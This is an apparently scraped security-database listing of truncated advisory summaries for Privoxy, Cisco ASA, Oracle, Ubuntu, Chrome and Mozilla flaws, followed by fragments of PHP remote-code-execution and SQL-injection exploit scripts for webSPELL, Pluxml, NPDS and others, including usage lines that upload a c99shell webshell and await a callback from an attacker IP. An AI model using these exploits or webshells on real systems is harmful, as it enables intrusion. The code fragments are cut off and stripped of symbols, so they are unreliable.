Privoxy 3.0.20-1 Credential Exposure
Privoxy Proxy Authentication Credential Exposure Product: Privoxy Project Homepage: privoxy.org Advisory ID: c22-2013-01 Vulnerable Versions: 3.0.20 and possibly prior Tested Version: 3.0.20-1 tested using Debian Sid Vendor Notification: March 6, 2013 Public Disclosure: March 11, 2013 Vulnerabili...
Privoxy Proxy - Authentication Information Disclosure
Privoxy Proxy - Authentication Information Disclosure source: https://www.securityfocus.com/bid/58425/info Privoxy is prone to multiple information-disclosure vulnerabilities. Attackers can exploit these issues to gain access to the user accounts and potentially obtain sensitive information. This...
privoxy -- malicious server spoofing as proxy vulnerability
Privoxy Developers reports: Proxy authentication headers are removed unless the new directive enable-proxy-authentication-forwarding is used. Forwarding the headers potentially allows malicious sites to trick the user into providing them with login information. Reported by Chris John Riley...
USN-1748-1: Thunderbird vulnerabilities
Bobby Holley discovered vulnerabilities in Chrome Object Wrappers (COW) and System Only Wrappers (SOW). If a user were tricked into opening a specially crafted page and had scripting enabled, a remote attacker could exploit this to bypass security protections to obtain sensitive information or...
CVE-2012-0335
Cisco Adaptive Security Appliances (ASA) 5500 series devices with software 7.2 through 8.4 do not properly perform proxy authentication during attempts to cut through a firewall, which allows remote attackers to obtain sensitive information via a connection attempt, aka Bug ID CSCtx42746...
Information disclosure
Cisco Adaptive Security Appliances (ASA) 5500 series devices with software 7.2 through 8.4 do not properly perform proxy authentication during attempts to cut through a firewall, which allows remote attackers to obtain sensitive information via a connection attempt, aka Bug ID CSCtx42746...
PT-2012-2509 · Cisco · Cisco Asa
Name of the Vulnerable Software and Affected Versions: Cisco Adaptive Security Appliances (ASA) 5500 series devices versions 7.2 through 8.4 Description: The issue allows remote attackers to obtain sensitive information via a connection attempt due to improper proxy authentication during attempts t...
Ubuntu Update for kde4libs USN-1248-1
Ubuntu Update for Linux kernel vulnerabilities USN-1248-1 OpenVAS Vulnerability Test $Id: gbubuntuUSN12481.nasl 7964 2017-12-01 07:32:11Z santu $ Ubuntu Update for kde4libs USN-1248-1 Authors: System Generated Check Copyright: Copyright c 2011 Greenbone Networks GmbH, http://www.greenbone.net Thi...
USN-1248-1: KDE-Libs vulnerability
Tim Brown discovered that KSSL in KDE-Libs did not properly perform input validation when displaying the common name (CN) for an SSL certificate. An attacker could exploit this to spoof the common name which could be used in an attack to trick the user into accepting a fraudulent certificate. This...
Google Chrome < 8.0.552.215 Multiple Vulnerabilities
The version of Google Chrome installed on the remote host is earlier than 8.0.552.215. Such versions are reportedly affected by multiple vulnerabilities: - It may be possible to bypass the pop-up blocker. Issue 17655 - A cross-origin video theft vulnerability exists related to canvas. Issue 5574...
CVE-2008-2625: Oracle DBMS – Proxy Authentication Vulnerability
Oracle is a widely-deployed Database Management System (DBMS) that supports a variety of applications. Many multi-tier applications are designed to use proxy authentication, restricting a middle tier to establish the database connection on behalf of the users. The standard authentication mechanism...
CVE-2005-4874
The XMLHttpRequest object in Mozilla 1.7.8 supports the HTTP TRACE method, which allows remote attackers to obtain (1) proxy authentication passwords via a request with a "Max-Forwards: 0" header or (2) arbitrary local passwords on the web server that hosts this object...
JBC Explorer <= 7.20 RC 1 Remote Code Execution Exploit
Exploit for unknown platform in category web applications ======================================================= JBC Explorer agent'Mozilla Firefox'; $xpl-allowredirection1; $xpl-cookiejar1; if$prx $xpl-proxy$prx; if$pra $xpl-proxyauth$pra; print "0x01Deleting the file auth.inc.php";...
Pluxml 0.3.1 Remote Code Execution Exploit
Exploit for unknown platform in category web applications ========================================== Pluxml 0.3.1 Remote Code Execution Exploit ========================================== sploit.php -url http://victim.com/pluxml0.3.1/ -ip 90.27.10.196 /Waiting for connection on...
Net Portal Dynamic System (NPDS) <= 5.10 Remote Code Execution
No description provided by source. !/usr/bin/php ?php errorreportingEALL ^ ENOTICE; Advisory soon if$argc 3 print" TITLE | Net Portal Dynamic System NPDS = 5.10 Remote Code Execution 0day AUTHOR | DarkFig / http://www.acid-root.new.fr / [email protected] NOTE | Works regardless of php settings...
webspell-exec.txt
!/usr/bin/php URL: http://www.acid-root.new.fr/ ----------------------------------------------------------------------- Usage: $argv0 -url -file Options Params: -url For example http://victim.com/webspell/ -file The file you wanna upload c99shell.php... Options: -prefix Table prefix default=webs...
webSPELL <= 4.01.02 Remote PHP Code Execution Exploit
Exploit for unknown platform in category web applications ===================================================== webSPELL -file Options Params: -url For example http://victim.com/webspell/ -file The file you wanna upload c99shell.php... Options: -prefix Table prefix default=webs -upmatch The match...
NukeSentinel 2.5.05 (nsbypass.php) Blind SQL Injection Exploit
Exploit for unknown platform in category web applications ============================================================== NukeSentinel 2.5.05 nsbypass.php Blind SQL Injection Exploit ============================================================== !/usr/bin/php -victim Opts Options: -isadmin Is the...